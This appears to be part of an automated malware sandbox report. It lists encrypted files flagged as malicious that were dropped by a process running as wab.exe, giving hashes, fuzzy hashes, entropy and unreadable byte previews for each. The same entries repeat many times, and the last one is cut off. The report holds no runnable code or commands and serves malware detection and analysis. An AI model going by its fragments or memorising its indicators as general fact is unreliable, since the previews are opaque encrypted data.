                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):173443
                                                                                Entropy (8bit):7.998747048084093
                                                                                Encrypted:true
                                                                                SSDEEP:3072:Awea5fTeETdWiKpt7Sn8MznP6hJHLpqf/oY8YCeQPUk9Zt7J4MAnm:cgpK7Sn8MTgUXo9IQPvJJn
                                                                                MD5:5B943FC8F33D9B956300933BD82A143A
                                                                                SHA1:15C81C93F92A691B4EA9DA4929223EA3A0930C43
                                                                                SHA-256:B168E21B7E1FD879049C5F0C91CE4594E3731D01CF28E75FBADC3CC3A58AED28
                                                                                SHA-512:8630E903CED1879CA3966BAB1B8338792302ECE70BD79D0F83BCBA4265867A8FB295D350BC0144007C6EE60C5C91156D046F1F2A0C0B051536A23014C2CE0EBD
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):174160
                                                                                Entropy (8bit):7.999020795554231
                                                                                Encrypted:true
                                                                                SSDEEP:3072:qYkAxLdbGyY2ihg2KTO0ttUIJz7WVg4yGxODBr3FXXl0g3FtlT0RCF2rY:qYb1JPecOQErjwNFnl0A0gFj
                                                                                MD5:0842FF3F617DADEB82C911F1989134B9
                                                                                SHA1:44ADE0E77F69518CDF54EC095337C08CA9E70E73
                                                                                SHA-256:DC567B5F053E18579E66207FED8568543570114966ACB4BB1D535F9BCD4B3EB2
                                                                                SHA-512:782013F1B27C8A548995ABFECF24AC9CD48E19EEC972F0FC51A44546C8994053226EF22441DEAF9C062398E8CD08C9A22731F2A6DA7761628ABB3D9BA8D2619F
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
                                                                                SHA-512:4834EE3E920F3C7CE6BDD759FCC7D1E1F4359EEA2654ED9C770F81DD3760F4ECAFF0207405270231E2FA259A4B4A5CE3ACCB7AEC7161AACFE164137FF6035656
                                                                                Malicious:true
                                                                                Preview:w.1$<...7l#..)........8\+..S.M..Z.Rb...Xs.6...D.O.vN.!.......o.k.w.3...L...Qf.....NpW.b....Y,.kIu2..k...{..m.[b............!r:.....wY{...l.c........j.1.E.Q..jY.I../.w...'..b.kS [...2......N......_:.4.".M...XM.4.f. H4....w....._kr.\...;HC......;c.[.c..7e.x..^...#|5..$...B.........ca/.E.@.....k/.g..c}R.B.&....m}8..4..GD..x..}.......Y.}..w.....sG.#RI&.Tm....A...D.X..:.,.Kg.9...I4..h...3.a?U,?..S.qc*X../bL.S....c..\.._6(...x[..M J|S.d.._......1......_.z..Z...v`...8.......8F.S.AeAW......wG``<.w.*xJ.C..e...8.1 *..{..>......f.L.....:(^............$..01'.D./.}um.......:.b^.7m2&..Qpa.S.....q4@.h@.j~8.K=.....XL...!.._C{I.Z.1.C96..[Z|=M.....!......h.q..y|&+r..L..~[7....2.[..........Cg...x...9.+u...)......j....D.U.\....7...)$)\........8....LO..o.......V.."...y.....Q._..g...].t.0.j1.^0..&*....u.A....5.....E.!.S.#...g..C.i..3.{.......%...b....E..z...a.:.:7.K'._.rT....j!z.0...Q..WQQ./..h...e....L..Z..G."...O...K...tH<&....E...EU...O.....x....&fv.{o..w.8_..@..
                                                                                Process:C:\Program Files (x86)\Windows Mail\wab.exe
                                                                                File Type:data
                                                                                Category:dropped
                                                                                Size (bytes):166087
                                                                                Entropy (8bit):7.999014096832287
                                                                                Encrypted:true
                                                                                SSDEEP:3072:xDMjcf8afz5Aj/NiCIWaL7iOiB3Wp8dUD7pTVolgHX1WDlL9kii7:ZIc0afzkI9WaXNiB3Wp8fla1WBNA
                                                                                MD5:299BB2F872BDE8618B336C9CC55E1E16
                                                                                SHA1:CA659B054A31949B466E820D21D9FD464D956AE2
                                                                                SHA-256:86A663F62EDDB7B30A9E48B2D7F5BCE7C6E3067236C69836C0F0D46A6DEA7B9D
